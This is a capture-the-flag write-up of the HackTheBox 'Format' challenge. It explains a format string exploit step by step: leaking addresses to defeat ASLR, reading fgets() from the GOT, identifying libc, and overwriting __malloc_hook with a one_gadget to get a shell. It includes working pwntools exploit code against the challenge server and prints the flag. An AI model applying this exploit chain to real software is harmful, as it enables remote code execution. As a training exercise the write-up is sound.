HackTheBox – Format Write-up

Dear readers,

Today’s write-up is on Format, a Pwn challenge on HackTheBox. It was created on 5th September 2020. This is a format string vulnerability challenge that has all protection enabled. Thus, read on if you are interested.

Fig 1. Format challenge on HackTheBox

Files provided

There is only one file provided which is a 64-bit ELF file:

Besides that, an IP address to the server hosting the file is also provided.

Tools needed

To install one_gadget and easily access it on the terminal, you can use the following command:

sudo apt -y install ruby
sudo gem install one_gadget

Outlook of the program

When running the program, nothing appears while the program waits for a user to input. Whatever you input, the program will reply back the same thing. This occurs to me that it might be a format string vulnerability challenge. True enough, when I input multiple %p into the program, additional data on the stack is being leaked.

> ./format
abc123
abc123
AAAAAAAA %p %p %p %p %p %p %p %p %p %p %p %p
AAAAAAAA 0x7fffc62bb080 0x7f60e61ed8d0 0x7f60e64714c0 0x7f60e61ed8c0 0x7f60e64714c0 0x4141414141414141 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x2520702520702520 0xa70252070 (nil)

Immediately, we can see our string’s being accessed by %p as 0x4141414141414141 is being printed.

Reverse Engineering

If we look at the program using any reverse engineering tool such as Ghidra, we can see that the program takes in our input at echo() and printed our input directly. This double confirms that this program has format string vulnerability.

Fig 5. Echo() function in the program

Besides that, the WHILE loop is infinite, allowing us to do multiple stages of the exploit if required such as leaking out the ASLR address before jumping to the shell, etc. The infinite WHILE loop also means that we cannot overwrite the return (RET) address of echo() so that the function jumps to the shell just like Return-oriented Programming (ROP). Therefore, we can only overwrite the Global Offset Table (GOT) or __malloc_hook() function pointer so that when the system function is called, our program will jump to the location of one gadget (just like ROP’s gadget) that has a set of instruction that will spawn a shell.

Security implemented

The next thing we want to look at is the protection set on the program. We can do this using checksec.

> checksec --file=./format
[*] '/home/soulx/documents/CTF/HackTheBox/Pwn/Format/format'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

Immediately, we can see that all protections are enabled. Despite this is an easy category challenge, I would rate it as hard.

As NX and canary are enabled, this means it is definitely not a stack overflow-related challenge. Since PIE/ASLR and full RELRO is enabled, we can only do the following method:

  1. Bypass ASLR of main program by exposing return address of the current function
  2. Get based address based on leaked address on step 1
  3. Leak any library function pointer’s content at Global Offset Table (GOT)
    • Bypass ASLR of libc
  4. Get the libc version
  5. Set the libc’s base address to the current ASLR address
  6. Find one gadget to launch a shell
  7. Overwrite __malloc_hook() function pointer
    • Alternative way to launch shell when full RELRO protection is enabled

Crafting the exploit

Crafting the exploit require multiple steps based on the steps I mentioned in the section “Security implemented“.

1. Bypass ASLR of main program by exposing return address of the current function

If you know about the format string attack, you will know that each %p or %x will lead to reading the stack to the higher address. This means that if we spam a lot of %x or %p, we will eventually read the return address of the current function which is echo() in this case.

Therefore, we can leak the return address using the code below. I split each %p so that I can split them and then use a FOR loop to know which index of %p contains the return address. You may also download the script here.

from pwn import *

context.update(arch="amd64", os="linux")

r = process("./format")

p256_A = "A" * 256
p50_p = " %p" * 50
r.sendline(p256_A + p50_p)
result = str(r.recvline()).split(' ')
for i in range(len(result)):
	print("[" + str(i) + "]: " + result[i])

Before we execute the script, we must disable the ASLR on our local operating system (OS) first.

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Executing the script allows us to know that the 41th index contains our return address as shown on Fig 7.1a.

Fig 7.1a Return address of echo() at 41th index

This address can be verified based on GDB’s entry point and on Ghidra as shown on Fig 7.1b and 7.1c respectively where we can see that the address starts from 0x800 while the offset from the base address of the program is 0x12B3.

Fig 7.1b. Entry point of the main program
Fig 7.1c. Address after “call echo” where base address is 0x100000

Finally, we can enable ASLR again using the following command:

echo 2 | sudo tee /proc/sys/kernel/randomize_va_space

Fig 7.1d shows the result of our return address with ASLR enabled at index 41.

Fig 7.1d Return address of echo() at index 41 with ASLR enabled

2. Get based address based on leaked address on step 1

Since we leaked the return address already which means we bypassed the ASLR of the main program, we can set the base address of the program using the script below. Note that the offset from the base address to the instruction after the return address is always the same as ASLR only changes the base address whenever the program executes afresh.

from pwn import *

context.update(arch="amd64", os="linux")

binary = ELF("./format")

r = remote("206.189.16.116", 30093)

## Get ASLR return address of echo() ##
p256_A = "A" * 256
p50_p = " %p" * 50
r.sendline(p256_A + p50_p)
# since we know leaked return address of echo() is at index 41 of our format string
leaked_ret_addr = (str(r.recvline()).split(' '))[41]
log.info("Leaked return address of echo(): " + leaked_ret_addr)


## Get ASLR base address of ./format ##
binary_base_addr = int(leaked_ret_addr, 16) - 0x12B3

3. Leak any library function pointer’s content at Global Offset Table (GOT)

Next, we can leak the libc’s ASLR address that is stored in the GOT table by getting the address of any library function. I used fgets() as shown in Fig 7.3a.

Fig 7.3a. fgets() at offset +0x3fc8 from the main program

Below shows the code where we save the GOT location of fgets().

## Get ASLR GOT of fgets() ##
fgets_got_addr = binary_base_addr + 0x3fc8
log.info("ASLR GOT location of fgets(): " + hex(fgets_got_addr))

Before we leak the content at that location of fgets() in GOT, I noticed that if we use a shorter string instead of 0x100 (256) ‘A’s, the string can be read starting from index 6 as shown in Fig 7.3b. This time round, I printed “ABCDEFGHABCDEFGH” with lots of %p.

Fig 7.3b. String “ABCDEFGHABCDEFGH” is used to test the index position

This means that we have to use index position 6 instead of 25 shown in Fig 7.1d for arbitrary read or write at address/location stated in our format string attack.

Finally, we can leak the content at that location as that location contains the address of fgets() in libc which is ASLR enabled thus always different whenever we run the program. We can do so by using a format string to arbitrarily read the content at the GOT location of fgets().

r.sendline(b"%7$s".ljust(8, b"\x00") + p64(fgets_got_addr))
# need to parse e.g: b'AA \x11\x22\x33\x44\x55\x66\x77\x88 \x22\x11.....'
leaked_fgets_libc = r.recv()
print(leaked_fgets_libc)
# convert from hex string to bytes but must from the starting "0x" from the string
leaked_fgets_libc = u64(leaked_fgets_libc.ljust(8, b"\x00"))
log.info("ASLR libc, fgets(): " + hex(leaked_fgets_libc))

Note that the format string for arbitrary read in the code above produces the following string. Note that the address is randomly made up for the example below. Note that the cyan font is the address to read the content from while the yellow font is appended due to p64() to make it up to 8 bytes due tom the 64-bits program. The green fonts are those values appended by ljust() to make the first half of the string 8 bytes as well. The first 8 bytes of the string will be in index 6 while the other half in index 7 as previously mentioned about the position of the string in Fig 7.3b

    <in index 6>              <in index 7>
%7$s\x00\x00\x00\x00\x77\x66\x55\x44\x33\x22\x00\x00

The address to read the content has to be placed in the 2nd half of the string as p64() will prepend \x00\x00 to 0x223344556677 before swapping them into the little-endian format which is just nice NULL in strings. When printing, the string will only be printed until it reaches NULL. Hence if we put our fgets() in GOT’s address in front, we will not be able to see the result of our %s which leaks the content in the address since the \x00 created by p64() will stop printf() from printing further. This can be seen below using the C language representation. Note that 6th slot is read by %6$s because fgets_got will be in the 6th slot since it is the 1st 8 bytes as shown by an example in Fig 7.3b.

printf(fgets_got + "\0\0" + "%6$s\0\0\0\0", fgets_got);

Besides that, I also use ljust() to append lots of NULLs into our %7$s to make it 8 bytes instead of using other characters. This is because strings will only print until the first NULL character (\x00). Thus, only the content of the fgets() in GOT will be leaked, allow us to have a clean result without the need to parse and clean out other additional not-needed values.

Note that 7 in %7$s is used as our fgets() in GOT is at the 7th index. %s is used as it will help to read what is in the content of the address we placed. This works just like the C code shown below.

printf("%7$s\0\0\0\0" + fgets_got + "\0\0", fgets_got);

4. Get the libc version

Since we have the leaked ASLR address of fgets(), we can now search the libc version in https://libc.blukat.me/. The results of the version obtained are shown in Fig 7.4. The version of that libc is then downloaded into the same directory as our exploit.

Fig 7.4 Version of libc used by the server found

5. Set the libc’s base address to the current ASLR address

The symbols of ELF of the libc will have the offset to fgets(). We can then use it to subtract the fgets() ASLR address we leaked to get the base address of libc. Set it in the ELF object of libc so it will make our life easier.

libc = ELF("./libc6_2.27-3ubuntu1_amd64.so")
# set ASLR base address of libc
libc.address = leaked_fgets_libc - libc.symbols['fgets']
log.info("ASLR libc base addrss: " + hex(libc.address))

6. Find one gadget to launch a shell

Next, we will need to find a gadget from the libc that contains instructions to call the shell as we only can write one address into the malloc hook pointer function unlike ROP allows multiple gadgets. We can do this using one_gadget. Using one_gadget, we can obtain the results shown below.

Fig 7.6. One_gadget’s results

7. Overwrite __malloc_hook() function pointer

Finally, the last step is to overwrite the __malloc_hook() function pointer. We can search for its proper name on Ghidra by running Ghidra on the libc file we download which is shown on Fig 7.7a.

Fig 7.7a. __malloc_hook() found in .data section

Since we already set the base address of the download libc on pwntools, using symbols will go to __malloc_hook at the right address. Thus, we can overwrite it using format string again. We can use %n to overwrite but since the value to overwrite is too big and very complex when crafting out the string, pwntools have a tool that helps us to craft it out as shown below.

log.info("ASLR malloc hook's address: " + hex(libc.symbols['__malloc_hook']))
one_gadget_shell = libc.address + 0x4f322
log.info("ASLR one gadget shell location: " + hex(one_gadget_shell))

## Overwrite __malloc_hook's content ##
r.sendline(fmtstr_payload(6, {libc.symbols['__malloc_hook'] : one_gadget_shell}))
r.recv()

Finally, we can trigger __malloc_hook() by triggering malloc() by allocating a large space on the stack shown below. We can then obtain the shell on the server.

## Trigger malloc() thus trigger __malloc_hook() thus spawn shell
r.sendline('%100000c')

r.interactive()

You may obtain the full exploit source code here.

Flag obtained

Fig 8. Flag obtained

Flag: HTB{mall0c_h00k_f0r_th3_w1n!}

I hope this post has been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my milk tea addiction. The link is here. 🙂

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.